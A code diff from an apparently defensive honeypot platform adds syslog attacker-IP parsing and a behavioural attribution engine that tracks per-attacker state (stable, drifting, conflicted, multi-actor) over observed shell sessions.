fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]") fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
msg_match = re.search(r'\]\s+(.+)$', sd_rest) # Always recover the post-SD message tail, even when the SD
if msg_match: # block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
msg = msg_match.group(1).strip() # syslog auto-emits on bash CMD lines). Without this the body
# of unwrapped PROMPT_COMMAND lines stays empty and the
# attacker_ip kv-fallback below has nothing to scan.
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
if msg_match:
msg = msg_match.group(1).strip()
else: else:
msg = sd_rest msg = sd_rest
attacker_ip = "Unknown" attacker_ip = "Unknown"
for fname in _IP_FIELDS: for fname in _IP_FIELDS:
if fname in fields: if fname in fields:
attacker_ip = fields[fname] raw = fields[fname]
# remote_addr may be "host:port" — split so identity keys on IP only.
host, _, port = raw.rpartition(":")
if host and port.isdigit():
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
fields.setdefault("remote_port", port)
else:
attacker_ip = raw
break break
# Fallback for plain `logger` callers that don't use SD params (notably # Fallback for plain `logger` callers that don't use SD params (notably
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
except ValueError: except ValueError:
ts_formatted = ts_raw ts_formatted = ts_raw
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
# "CMD ") get event_type rewritten to "command". `fields` stays empty
# so the frontend's msg-based pill rendering doesn't double up.
if event_type == "-" and msg.startswith("CMD "):
event_type = "command"
return { return {
"timestamp": ts_formatted, "timestamp": ts_formatted,
"decky": decky, "decky": decky,
@@ -346,7 +645,7 @@ def _stream_container(
publish_fn: CollectorPublishFn | None = None, publish_fn: CollectorPublishFn | None = None,
) -> None: ) -> None:
"""Stream logs from one container and append to the host log files.""" """Stream logs from one container and append to the host log files."""
import docker # type: ignore[import] import docker
lf: Optional[Any] = None lf: Optional[Any] = None
jf: Optional[Any] = None jf: Optional[Any] = None
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
thread can call it unconditionally. Otherwise each call is marshalled thread can call it unconditionally. Otherwise each call is marshalled
onto *loop* (the asyncio event loop that owns the bus socket) via onto *loop* (the asyncio event loop that owns the bus socket) via
``make_thread_safe_publisher``. ``make_thread_safe_publisher``.
The same call also feeds a :class:`_SessionAggregator` so shell
commands are indexed per-attacker_ip and ``attacker.session.ended``
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
""" """
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
if raw_publish is None: if raw_publish is None:
return lambda _parsed: None return lambda _parsed: None
topic = _topics.system(_topics.SYSTEM_LOG) topic = _topics.system(_topics.SYSTEM_LOG)
aggregator = _SessionAggregator(raw_publish)
def _publish(parsed: dict[str, Any]) -> None: def _publish(parsed: dict[str, Any]) -> None:
event_type = parsed.get("event_type", "") event_type = parsed.get("event_type", "")
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
}, },
event_type, event_type,
) )
aggregator.add_event(parsed)
return _publish return _publish
@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:
Watches Docker events to pick up containers started after initial scan. Watches Docker events to pick up containers started after initial scan.
""" """
import docker # type: ignore[import] import docker
log_path = Path(log_file) log_path = Path(log_file)
json_path = log_path.with_suffix(".json") json_path = log_path.with_suffix(".json")

View File

@@ -39,6 +39,7 @@ Shape::
master-host = 10.0.0.1 # required on agents master-host = 10.0.0.1 # required on agents
syslog-port = 6514 syslog-port = 6514
swarmctl-port = 8770 swarmctl-port = 8770
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
[logging] [logging]
system-log = /var/log/decnet/decnet.system.log system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
"master-host": "DECNET_SWARM_MASTER_HOST", "master-host": "DECNET_SWARM_MASTER_HOST",
"syslog-port": "DECNET_SWARM_SYSLOG_PORT", "syslog-port": "DECNET_SWARM_SYSLOG_PORT",
"swarmctl-port": "DECNET_SWARMCTL_PORT", "swarmctl-port": "DECNET_SWARMCTL_PORT",
"swarmctl-host": "DECNET_SWARMCTL_HOST",
}, },
"logging": { "logging": {
"system-log": "DECNET_SYSTEM_LOGS", "system-log": "DECNET_SYSTEM_LOGS",

View File

@@ -0,0 +1,21 @@
"""DECNET attribution engine — v0 aggregation library.
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
live in :mod:`decnet.correlation.attribution_worker` so this package
stays trivially testable with synthetic observation lists.
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
explicit bright line: this engine does NOT do persona classification
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
named persons. It surfaces *behavioural coherence* and *behavioural
drift*, and stops there.
"""
from __future__ import annotations
from decnet.correlation.attribution.aggregate import (
AttributionState,
aggregate_observations,
)
__all__ = ["AttributionState", "aggregate_observations"]

View File

@@ -0,0 +1,62 @@
"""Calibration thresholds for the attribution engine — every magic
number lives here, named, with the calibration source cited.
v0 values are heuristic. Real calibration ships when red-team
exercises produce labelled trace data
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
are the engine's only knobs; aggregate.py never embeds a literal.
"""
from __future__ import annotations
# ── Categorical merger ────────────────────────────────────────────────
# Last-N window size for the categorical state machine. 5 calibrates
# against typical session counts (most attackers are observed < 10
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
# 2"). Operators with long-running attackers will want a wider window
# in v1.
CATEGORICAL_WINDOW_N = 5
# Minimum observations before the merger emits anything other than
# ``unknown``. Below this floor the state machine has no signal.
MIN_OBSERVATIONS_FOR_STATE = 3
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
CATEGORICAL_MAJORITY_THRESHOLD = 4
# ── Numeric merger ────────────────────────────────────────────────────
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
# observations enough to surface drift quickly without flapping on
# single outliers.
NUMERIC_EWMA_ALPHA = 0.3
# Coefficient-of-variation thresholds: dispersion / |mean|.
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
# ── Hash merger ───────────────────────────────────────────────────────
# Rotations within HASH_DRIFT_WINDOW count toward state transitions.
# Below DRIFT_MAX → drifting; above → conflicted. The values mirror the
# DEBT-032 fingerprint-rotation calibration — bumped by one because
# the attribution engine takes one rotation as evidence-of-life, not
# yet evidence-of-drift.
HASH_DRIFT_MAX = 2
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
# ── Multi-actor cap ───────────────────────────────────────────────────
# multi_actor confidence is capped to keep the dashboard honest about
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
# flapping primitives on flaky networks look like two operators.
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
# Minimum number of primitives that must independently flag
# ``multi_actor`` for the same identity before
# ``attribution.profile.multi_actor_suspected`` fires.
MULTI_ACTOR_MIN_PRIMITIVES = 2
# Tick interval for the periodic walk in
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
# var in v1; hardcoded in v0.
MULTI_ACTOR_TICK_SECS = 60.0

View File

@@ -0,0 +1,418 @@
"""Per-(identity, primitive) state-machine — the attribution engine's
core merge logic.
Pure: given a list of BEHAVE observations for one
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
returns the derived state. No DB, no bus, no I/O. The worker
(``decnet.correlation.attribution_worker``) is responsible for loading
the observations and writing the state row.
State vocabulary is frozen at five values (see
``ATTRIBUTION-ENGINE.md``):
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
* ``stable`` — recent N agree
* ``drifting`` — recent N stable but disagree with older N
* ``conflicted`` — recent N split
* ``multi_actor`` — conflicted + cross-session alternation pattern
Phase 2 ships :func:`_aggregate_categorical` (the dominant ValueKind
for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
the ValueKind dispatcher in :func:`aggregate_observations`.
"""
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass
from typing import Any, Sequence
from decnet.correlation.attribution import _thresholds as _T
__all__ = [
"AttributionState",
"aggregate_observations",
"aggregate_categorical",
"aggregate_numeric",
"aggregate_hash",
]
@dataclass(frozen=True)
class AttributionState:
"""Output of the merger for one ``(identity, primitive)`` pair.
The fields map onto :class:`AttributionStateRow` columns; the
worker composes the final dict for ``upsert_attribution_state``
by adding ``identity_uuid`` + ``primitive`` (the merger does not
own the natural key) and a ``last_change_ts`` derived from the
prior row.
"""
current_value: Any
state: str
confidence: float
observation_count: int
last_observation_ts: float
def aggregate_observations(
observations: Sequence[dict[str, Any]],
*,
value_kind: str | None = None,
) -> AttributionState:
"""Run the merger over *observations* and return derived state.
*observations* is a list of dicts with at minimum ``value``,
``ts``, ``confidence`` (matching
``ObservationRow.observations_time_series`` output). Sessions
are derived from the ``ts`` axis — the merger does not need a
separate session id; cross-session alternation is detected by
the gap distribution. Sessions are NOT collapsed before the
merger; ``multi_actor`` reasons over the full per-observation
series.
*value_kind* is a hint from the BEHAVE primitive registry — Phase
2 only honours ``"categorical"`` (or ``None``, treated as
categorical). Phase 3 will dispatch on ``"numeric"`` /
``"hash"`` to the matching merger.
"""
if not observations:
return _unknown(0.0, count=0)
if value_kind in (None, "categorical"):
return aggregate_categorical(observations)
if value_kind == "numeric":
return aggregate_numeric(observations)
if value_kind == "hash":
return aggregate_hash(observations)
raise ValueError(
f"aggregate_observations: unknown value_kind={value_kind!r}; "
"expected 'categorical' | 'numeric' | 'hash' | None",
)
def aggregate_numeric(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Numeric merger — for primitives whose ``value`` is an int /
float (e.g. ``toolchain.c2.beacon_interval_ms``,
``motor.paste_burst_rate``).
Compares the EWMA of the recent window against the EWMA of the
older window; reports dispersion as coefficient of variation.
* < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
* recent CV < ``NUMERIC_STABLE_DISPERSION_PCT`` *and* mean shift
from older window < ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``stable``
* mean shifted >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
* recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
* otherwise → ``stable`` (falling-through case for moderate
dispersion that hasn't yet become drift)
Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
tighter dispersion = higher confidence. Conflicted is ``0.5``
by convention; we cannot meaningfully claim certainty in a
statistic computed over a degenerate sample.
``current_value`` is the recent EWMA, not the last raw
observation: numeric primitives are noisy by nature and
surfacing the smoothed estimate keeps the dashboard from
flapping on every tick. ``multi_actor`` is *not* a numeric state
in v0 — bimodal distributions belong to the categorical
detector once the primitive's value space is bucketed.
"""
n = len(observations)
last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
return AttributionState(
current_value=_safe_float(observations[-1].get("value")) if n else None,
state="unknown",
confidence=0.0,
observation_count=n,
last_observation_ts=last_ts,
)
window = _T.CATEGORICAL_WINDOW_N
recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
older_vals = [
_safe_float(o.get("value"))
for o in observations[-2 * window: -window]
]
recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
recent_cv = _coef_of_variation(recent_vals, recent_mean)
if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
return AttributionState(
current_value=recent_mean,
state="conflicted",
confidence=0.5,
observation_count=n,
last_observation_ts=last_ts,
)
if older_vals:
older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
denom = abs(older_mean) if older_mean != 0 else 1.0
mean_shift = abs(recent_mean - older_mean) / denom
if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
return AttributionState(
current_value=recent_mean,
state="drifting",
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=recent_mean,
state="stable",
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
observation_count=n,
last_observation_ts=last_ts,
)
def aggregate_hash(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Hash merger — for rotation-resistant fingerprints
(``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
The merger does NOT recompute hashes; DEBT-032
(``decnet.correlation.fingerprint_rotation``) already produces
one observation per rotation event. The state machine counts
distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
most recent observation:
* 0 rotations (single hash, any count) → ``stable``
* 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
* > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
``unknown`` fires only on empty input — a single hash with one
observation is enough signal to say "stable", because hashes
don't have a noisy baseline the way categorical/numeric
primitives do.
``current_value`` is the most recent hash. Confidence is
``1 / (1 + rotations_in_window)`` — one rotation halves
confidence, two thirds it, etc.
"""
n = len(observations)
if n == 0:
return _unknown(0.0, count=0)
last_ts = float(observations[-1].get("ts", 0.0))
last_value = observations[-1].get("value")
window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
in_window = [
o for o in observations
if float(o.get("ts", 0.0)) >= window_start
]
distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
rotations = max(0, distinct - 1)
confidence = 1.0 / (1.0 + rotations)
if rotations == 0:
state = "stable"
elif rotations <= _T.HASH_DRIFT_MAX:
state = "drifting"
else:
state = "conflicted"
return AttributionState(
current_value=last_value,
state=state,
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
def _ewma(values: Sequence[float], alpha: float) -> float:
"""Single-pass EWMA. Empty input is illegal; callers gate on
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
it = iter(values)
smoothed = next(it)
for v in it:
smoothed = alpha * v + (1.0 - alpha) * smoothed
return smoothed
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
signal; returns +inf-equivalent (1e9) when the mean is exactly
zero and the signal isn't constant — so the conflicted threshold
fires without us having to special-case it upstream."""
if not values:
return 0.0
diffs_sq = [(v - mean) ** 2 for v in values]
variance = sum(diffs_sq) / len(values)
stdev = variance ** 0.5
if mean == 0:
return 0.0 if stdev == 0 else 1e9
return stdev / abs(mean)
def _safe_float(value: Any) -> float:
"""Defensive coercion — observations may carry value=None on
unknown-emitter primitives. Treat None as 0.0; the dispersion
check will surface the resulting flat baseline as 'stable'
which is the honest answer for a single-observation primitive
that hasn't fired yet."""
if value is None:
return 0.0
if isinstance(value, bool):
return 1.0 if value else 0.0
return float(value)
def aggregate_categorical(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Categorical merger — the dominant case for BEHAVE-SHELL.
Compares the recent N-window against the older N-window. With
``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
= 4``:
* fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
* recent window has a clear majority + matches older window → ``stable``
* recent window has a clear majority + differs from older window → ``drifting``
* recent window split + alternation pattern across observations → ``multi_actor``
* recent window split + no alternation → ``conflicted``
Confidence is the recent-window agreement ratio; ``multi_actor``
is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
the most-recent observation's value as ``current_value``
regardless of state — the dashboard wants a value to render
even on ``conflicted`` rows.
"""
n = len(observations)
last_ts = float(observations[-1].get("ts", 0.0))
last_value = observations[-1].get("value")
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
return AttributionState(
current_value=last_value,
state="unknown",
confidence=0.0,
observation_count=n,
last_observation_ts=last_ts,
)
window = _T.CATEGORICAL_WINDOW_N
recent = observations[-window:]
recent_values = [o.get("value") for o in recent]
recent_count = Counter(recent_values)
top_value, top_count = recent_count.most_common(1)[0]
recent_size = len(recent)
confidence = top_count / recent_size
is_recent_clear = top_count >= min(
_T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
)
if not is_recent_clear:
# Split recent window. Distinguish multi_actor (alternation)
# from random conflict.
if _is_alternation(observations):
return AttributionState(
current_value=last_value,
state="multi_actor",
confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=last_value,
state="conflicted",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
# Recent window has a clear majority. Compare to the prior
# window to decide stable vs drifting.
older = observations[-2 * window: -window]
if not older:
# Only one window's worth of data — call it stable. The
# dashboard already gates "unknown" on
# MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
# only when the operator has produced enough observations
# for one full window but not two.
return AttributionState(
current_value=top_value,
state="stable",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
older_values = [o.get("value") for o in older]
older_count = Counter(older_values)
older_top_value, older_top_count = older_count.most_common(1)[0]
older_size = len(older)
older_clear = older_top_count >= min(
_T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
)
if not older_clear:
# Older window was itself conflicted; we just stabilised.
# That's drift in the colloquial sense — the attacker
# converged onto a single behaviour.
return AttributionState(
current_value=top_value,
state="drifting",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
if older_top_value != top_value:
return AttributionState(
current_value=top_value,
state="drifting",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=top_value,
state="stable",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
"""Heuristic: do recent observations alternate between two values
(operator A → B → A → B), as opposed to random thrashing?
Conservative: requires at least 4 observations in the window,
exactly 2 distinct values, and that flips outnumber repeats by
at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
that flapping primitives on flaky networks look like two
operators; this guard is what keeps the false-positive rate down.
"""
window = _T.CATEGORICAL_WINDOW_N
recent = observations[-window:]
if len(recent) < 4:
return False
values = [o.get("value") for o in recent]
distinct = set(values)
if len(distinct) != 2:
return False
flips = sum(
1 for i in range(1, len(values)) if values[i] != values[i - 1]
)
repeats = (len(values) - 1) - flips
return flips >= 2 * max(repeats, 1)
def _unknown(last_ts: float, *, count: int) -> AttributionState:
return AttributionState(
current_value=None,
state="unknown",
confidence=0.0,
observation_count=count,
last_observation_ts=last_ts,
)

View File

@@ -0,0 +1,394 @@
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
Subscribes to ``attacker.observation.>`` and, for each event, ensures
the source attacker has a stub identity in ``attacker_identities``.
Phase 1 does **not** invoke the merger or write
``attribution_state`` rows; that wiring lands in Phase 4 once the
Phase 2/3 mergers are in.
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
with a wake event, fall back to poll-only if the bus is unavailable,
publish derived events with :func:`publish_safely`, log per-handler
exceptions and continue.
Trigger isolation: the per-event handler is wrapped in a single
try/except. Any exception is logged and the loop continues with the
next event. This is the same posture BEHAVE-SHELL's
``_handler.handle_session_ended`` adopts.
"""
from __future__ import annotations
import asyncio
import contextlib
from typing import Any
from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
run_control_listener_signal as _run_control_listener_signal,
run_health_heartbeat as _run_health_heartbeat,
)
from decnet.correlation.attribution import _thresholds as _T
from decnet.correlation.attribution.aggregate import aggregate_observations
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
try:
from behave_shell.spec import (
PRIMITIVE_REGISTRY,
ValueKind,
)
_BEHAVE_REGISTRY_AVAILABLE = True
except ImportError: # pragma: no cover
PRIMITIVE_REGISTRY = {}
ValueKind = None
_BEHAVE_REGISTRY_AVAILABLE = False
log = get_logger("correlation.attribution_worker")
_WORKER_NAME = "attribution"
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
async def run_attribution_loop(
repo: BaseRepository,
*,
shutdown: asyncio.Event | None = None,
multi_actor_tick_secs: float | None = None,
) -> None:
"""Run the attribution worker until cancelled.
Three concurrent tasks under one supervisor:
1. ``_consume_observations`` — bus subscription on
``attacker.observation.>``; per-event handler upserts state.
2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
firing ``attribution.profile.multi_actor_suspected`` when an
identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
``multi_actor`` state. Phase 5.
3. Health + control standard channels.
*shutdown* is an optional external stop signal.
*multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
(tests use this to drive the correlator without sleeping for a
minute).
"""
log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
bus: BaseBus | None = None
sub_task: asyncio.Task | None = None
tick_task: asyncio.Task | None = None
heartbeat_task: asyncio.Task | None = None
control_task: asyncio.Task | None = None
tick_secs = (
multi_actor_tick_secs
if multi_actor_tick_secs is not None
else _T.MULTI_ACTOR_TICK_SECS
)
try:
candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
await candidate.connect()
bus = candidate
sub_task = asyncio.create_task(
_consume_observations(bus, repo),
)
tick_task = asyncio.create_task(
_multi_actor_tick_loop(bus, repo, tick_secs),
)
heartbeat_task = asyncio.create_task(
_run_health_heartbeat(bus, _WORKER_NAME),
)
control_task = asyncio.create_task(
_run_control_listener_signal(bus, _WORKER_NAME),
)
except Exception as exc: # noqa: BLE001
log.warning(
"attribution worker: bus unavailable, idle until bus returns: %s",
exc,
)
if shutdown is None:
shutdown = asyncio.Event()
try:
await shutdown.wait()
except (asyncio.CancelledError, KeyboardInterrupt):
log.info("attribution worker stopped")
finally:
for task in (sub_task, tick_task, heartbeat_task, control_task):
if task is None:
continue
task.cancel()
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
async def _consume_observations(
bus: BaseBus, repo: BaseRepository,
) -> None:
"""Pull events off ``attacker.observation.>`` and dispatch each
to :func:`handle_observation_event`.
Per-event exceptions are caught and logged; the subscription
survives bad payloads. If the subscription itself dies (bus
disconnect), the worker idles — the supervisor systemd unit
will restart on a clean exit.
"""
try:
sub = bus.subscribe(_OBSERVATION_PATTERN)
async with sub:
async for event in sub:
try:
await handle_observation_event(bus, repo, event)
except Exception: # noqa: BLE001
log.exception("attribution worker: handler failed")
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
log.warning(
"attribution worker: subscriber for %s died (%s)",
_OBSERVATION_PATTERN, exc,
)
async def handle_observation_event(
bus: BaseBus | None,
repo: BaseRepository,
event: Any,
) -> None:
"""Handle one ``attacker.observation.<primitive>`` event.
Phase 1: ensure the source attacker has a stub identity, then log
and return. Phase 4 will: load prior state, run merger, upsert
new state, emit ``attribution.profile.state_changed`` on
transition.
*event* is whatever shape :class:`BaseBus`'s subscription yields —
a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
fields. The payload carries the BEHAVE envelope plus DECNET-side
``attacker_uuid`` denorm (see
``decnet.profiler.behave_shell._handler._publish_observation``).
"""
payload = _payload_of(event)
attacker_uuid = payload.get("attacker_uuid")
primitive = payload.get("primitive")
if not attacker_uuid or not primitive:
log.debug(
"attribution worker: skipping malformed event (uuid=%r primitive=%r)",
attacker_uuid, primitive,
)
return
identity_uuid = await repo.ensure_stub_identity_for_attacker(
str(attacker_uuid),
)
if identity_uuid is None:
log.info(
"attribution worker: no Attacker row for uuid=%s yet; deferring",
attacker_uuid,
)
return
primitive_str = str(primitive)
# Load the full per-(identity, primitive) observation series.
# v0 with 1:1 stub identities, this is the single attacker's
# series; v1's clusterer makes it a cross-attacker union.
observations = await repo.observations_for_identity_primitive(
identity_uuid, primitive_str,
)
if not observations:
log.debug(
"attribution worker: no observations yet for identity=%s "
"primitive=%s (race with upsert)",
identity_uuid, primitive_str,
)
return
# Run merger.
value_kind = _value_kind_for(primitive_str)
new_state = aggregate_observations(observations, value_kind=value_kind)
# Load prior state to detect transitions.
prior = await repo.get_attribution_state(identity_uuid, primitive_str)
state_changed = prior is None or prior.get("state") != new_state.state
# Persist. last_change_ts is locked to the prior row when state is
# unchanged so the dashboard's "stable since" timestamp doesn't
# reset on every observation.
if prior is not None and not state_changed:
last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
else:
last_change_ts = new_state.last_observation_ts
await repo.upsert_attribution_state({
"identity_uuid": identity_uuid,
"primitive": primitive_str,
"current_value": new_state.current_value,
"state": new_state.state,
"confidence": new_state.confidence,
"observation_count": new_state.observation_count,
"last_change_ts": last_change_ts,
"last_observation_ts": new_state.last_observation_ts,
})
# Emit state_changed only on transition. Idempotent re-runs (same
# observations, same merger output) produce no event — matches
# the loop-prevention invariant that ttp.tagged uses.
if state_changed and bus is not None:
await publish_safely(
bus,
_topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
{
"identity_uuid": identity_uuid,
"primitive": primitive_str,
"old_state": prior.get("state") if prior else None,
"new_state": new_state.state,
"current_value": new_state.current_value,
"confidence": new_state.confidence,
"observation_count": new_state.observation_count,
"ts": new_state.last_observation_ts,
},
event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
)
log.info(
"attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
identity_uuid, primitive_str,
(prior or {}).get("state") or "<new>", new_state.state,
new_state.confidence,
)
def _value_kind_for(primitive: str) -> str:
"""Resolve a BEHAVE primitive name to the merger's ValueKind tag.
Maps the BEHAVE registry's ``ValueKind`` enum onto the three
mergers the engine ships:
* ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
``"categorical"`` (BOOL is a 2-cardinality categorical;
FREE_STRING and ARRAY collapse to opaque-token categorical
until a v1 specialised merger lands)
* ``NUMERIC`` → ``"numeric"``
* ``HASH`` → ``"hash"``
Unknown primitives (registry miss) default to categorical — the
safest fallback because the categorical merger is one-outlier-
tolerant and won't lie about confidence on noisy categorical
data the way a numeric merger would on non-numeric values.
"""
if not _BEHAVE_REGISTRY_AVAILABLE:
return "categorical"
spec = PRIMITIVE_REGISTRY.get(primitive)
if spec is None or ValueKind is None:
return "categorical"
if spec.kind is ValueKind.NUMERIC:
return "numeric"
if spec.kind is ValueKind.HASH:
return "hash"
return "categorical"
def _payload_of(event: Any) -> dict[str, Any]:
"""Extract the dict payload from a BusEvent or fall through if
*event* is already a dict (test fixtures may pass either)."""
payload = getattr(event, "payload", event)
return payload if isinstance(payload, dict) else {}
async def _multi_actor_tick_loop(
bus: BaseBus, repo: BaseRepository, interval_secs: float,
) -> None:
"""Walk ``attribution_state`` every *interval_secs* and emit
``attribution.profile.multi_actor_suspected`` for any identity
whose multi_actor primitives changed since the last tick.
Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
frozenset(primitives). Same primitive set as last fire → no
re-emit. New primitive joining the set → re-emit. Set shrinks
below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
re-arms.
In-memory dedup is honest for v0 — restart-resets are
acceptable because the underlying ``attribution_state`` rows
persist; on first tick after restart we re-emit the current
set. v1 may persist a ``multi_actor_suspect_log`` table.
"""
last_fired: dict[str, frozenset[str]] = {}
try:
while True:
try:
await tick_multi_actor(bus, repo, last_fired)
except Exception: # noqa: BLE001
log.exception("attribution worker: multi_actor tick failed")
await asyncio.sleep(interval_secs)
except asyncio.CancelledError:
raise
async def tick_multi_actor(
bus: BaseBus | None,
repo: BaseRepository,
last_fired: dict[str, frozenset[str]],
) -> int:
"""One pass of the cross-primitive correlator. Public for tests.
Returns the number of ``multi_actor_suspected`` events emitted.
"""
candidates = await repo.list_multi_actor_identities()
fired = 0
seen_now: set[str] = set()
for entry in candidates:
identity_uuid = str(entry["identity_uuid"])
primitives: list[str] = sorted(entry.get("primitives") or [])
seen_now.add(identity_uuid)
if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
# Repo already filters to >= 2 today; defensive against
# future schema drift.
continue
signature = frozenset(primitives)
if last_fired.get(identity_uuid) == signature:
continue
last_fired[identity_uuid] = signature
if bus is None:
continue
await publish_safely(
bus,
_topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
{
"identity_uuid": identity_uuid,
"primitives": primitives,
"evidence_summary": (
f"{len(primitives)} primitives flagged multi_actor"
),
"confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
"ts": _now(),
},
event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
)
fired += 1
log.info(
"attribution worker: multi_actor_suspected identity=%s primitives=%s",
identity_uuid, primitives,
)
# Rearm: any identity that was in last_fired but no longer in
# candidates dropped below the threshold; remove so the next
# qualifying flap re-fires.
for stale in [k for k in last_fired if k not in seen_now]:
del last_fired[stale]
return fired
def _now() -> float:
"""Wall-clock seconds. Wrapped so tests can monkeypatch."""
import time
return time.time()
__all__ = [
"run_attribution_loop",
"handle_observation_event",
"tick_multi_actor",
]

View File

@@ -0,0 +1,153 @@
"""Attacker substrate-fingerprint rotation detection.
Called inline from the prober at each fingerprint emit site. Looks up
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
when the new hash differs from the last one, emits a derived
